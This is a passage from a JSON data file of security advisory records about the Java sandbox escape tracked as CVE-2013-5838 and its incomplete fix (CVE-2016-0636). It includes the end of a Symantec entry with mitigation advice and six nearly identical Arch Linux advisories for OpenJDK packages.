provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "published": "2013-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/63131", "cvelist": ["CVE-2013-5838"], "lastseen": "2018-03-12T02:29:12"}], "archlinux": [{"id": "ASA-201603-25", "type": "archlinux", "title": "jdk8-openjdk: sandbox escape", "description": "It was discovered that the security fix for CVE-2013-5838 was incomplete\nand still allowed remote attackers to escape the Java security sandbox\nmechanism.\nThe root problem is that the Reflection API does not properly guarantee\ntype safety when Method Handle objects were invoked across two different\nClass Loader namespaces.\nA part of the original patch was to use the &quot;loadersAreRelated()&quot; method\nto ensure that the two Class Loaders are related, which is a condition\nfor correct type safety.\nHowever, this condition could be easily fulfilled by abusing certain\nbehaviors in the class loading process, which could allow an attacker\nto bypass the type safety checks and ultimately escape the security\nsandbox mechanism.", "published": "2016-03-29T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://lists.archlinux.org/pipermail/arch-security/2016-March/000590.html", "cvelist": ["CVE-2016-0636", "CVE-2013-5838"], "lastseen": "2016-09-02T18:44:45"}, {"id": "ASA-201603-26", "type": "archlinux", "title": "jre8-openjdk: sandbox escape", "description": "It was discovered that the security fix for CVE-2013-5838 was incomplete\nand still allowed remote attackers to escape the Java security sandbox\nmechanism.\nThe root problem is that the Reflection API does not properly guarantee\ntype safety when Method Handle objects were invoked across two different\nClass Loader namespaces.\nA part of the original patch was to use the &quot;loadersAreRelated()&quot; method\nto ensure that the two Class Loaders are related, which is a condition\nfor correct type safety.\nHowever, this condition could be easily fulfilled by abusing certain\nbehaviors in the class loading process, which could allow an attacker\nto bypass the type safety checks and ultimately escape the security\nsandbox mechanism.", "published": "2016-03-29T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://lists.archlinux.org/pipermail/arch-security/2016-March/000591.html", "cvelist": ["CVE-2016-0636", "CVE-2013-5838"], "lastseen": "2016-09-02T18:44:40"}, {"id": "ASA-201604-3", "type": "archlinux", "title": "jre7-openjdk-headless: sandbox escape", "description": "It was discovered that the security fix for CVE-2013-5838 was incomplete\nand still allowed remote attackers to escape the Java security sandbox\nmechanism.\nThe root problem is that the Reflection API does not properly guarantee\ntype safety when Method Handle objects were invoked across two different\nClass Loader namespaces.\nA part of the original patch was to use the &quot;loadersAreRelated()&quot; method\nto ensure that the two Class Loaders are related, which is a condition\nfor correct type safety.\nHowever, this condition could be easily fulfilled by abusing certain\nbehaviors in the class loading process, which could allow an attacker\nto bypass the type safety checks and ultimately escape the security\nsandbox mechanism.", "published": "2016-04-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://lists.archlinux.org/pipermail/arch-security/2016-April/000595.html", "cvelist": ["CVE-2016-0636", "CVE-2013-5838"], "lastseen": "2016-09-02T18:44:37"}, {"id": "ASA-201603-27", "type": "archlinux", "title": "jre8-openjdk-headless: sandbox escape", "description": "It was discovered that the security fix for CVE-2013-5838 was incomplete\nand still allowed remote attackers to escape the Java security sandbox\nmechanism.\nThe root problem is that the Reflection API does not properly guarantee\ntype safety when Method Handle objects were invoked across two different\nClass Loader namespaces.\nA part of the original patch was to use the &quot;loadersAreRelated()&quot; method\nto ensure that the two Class Loaders are related, which is a condition\nfor correct type safety.\nHowever, this condition could be easily fulfilled by abusing certain\nbehaviors in the class loading process, which could allow an attacker\nto bypass the type safety checks and ultimately escape the security\nsandbox mechanism.", "published": "2016-03-29T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://lists.archlinux.org/pipermail/arch-security/2016-March/000592.html", "cvelist": ["CVE-2016-0636", "CVE-2013-5838"], "lastseen": "2016-09-02T18:44:42"}, {"id": "ASA-201604-2", "type": "archlinux", "title": "jre7-openjdk: sandbox escape", "description": "It was discovered that the security fix for CVE-2013-5838 was incomplete\nand still allowed remote attackers to escape the Java security sandbox\nmechanism.\nThe root problem is that the Reflection API does not properly guarantee\ntype safety when Method Handle objects were invoked across two different\nClass Loader namespaces.\nA part of the original patch was to use the &quot;loadersAreRelated()&quot; method\nto ensure that the two Class Loaders are related, which is a condition\nfor correct type safety.\nHowever, this condition could be easily fulfilled by abusing certain\nbehaviors in the class loading process, which could allow an attacker\nto bypass the type safety checks and ultimately escape the security\nsandbox mechanism.", "published": "2016-04-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://lists.archlinux.org/pipermail/arch-security/2016-April/000594.html", "cvelist": ["CVE-2016-0636", "CVE-2013-5838"], "lastseen": "2016-09-02T18:44:48"}, {"id": "ASA-201604-1", "type": "archlinux", "title": "jdk7-openjdk: sandbox escape", "description": "It was discovered that the security fix for CVE-2013-5838 was incomplete\nand still allowed remote attackers to escape the Java security sandbox\nmechanism.\nThe root problem is that the Reflection API does not properly guarantee\ntype safety when Method Handle objects were invoked across two different\nClass Loader namespaces.\nA part of the original patch was to use the &quot;loadersAreRelated()&quot; method\nto ensure that the two Class Loaders are related, which is a condition\nfor correct type safety.\nHowever, this condition could be easily fulfilled by abusing certain\nbehaviors in the class loading process, which could allow an attacker\nto bypass the type safety checks and ultimately escape the security\nsandbox mechanism.", "published": "2016-04-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://lists.archlinux.org/pipermail/arch-security/2016-April/000593.html", "cvelist": ["CVE-2016-0636", "CVE-2013-5838"], "lastseen": "2016-09-02T18:44:46"}]}}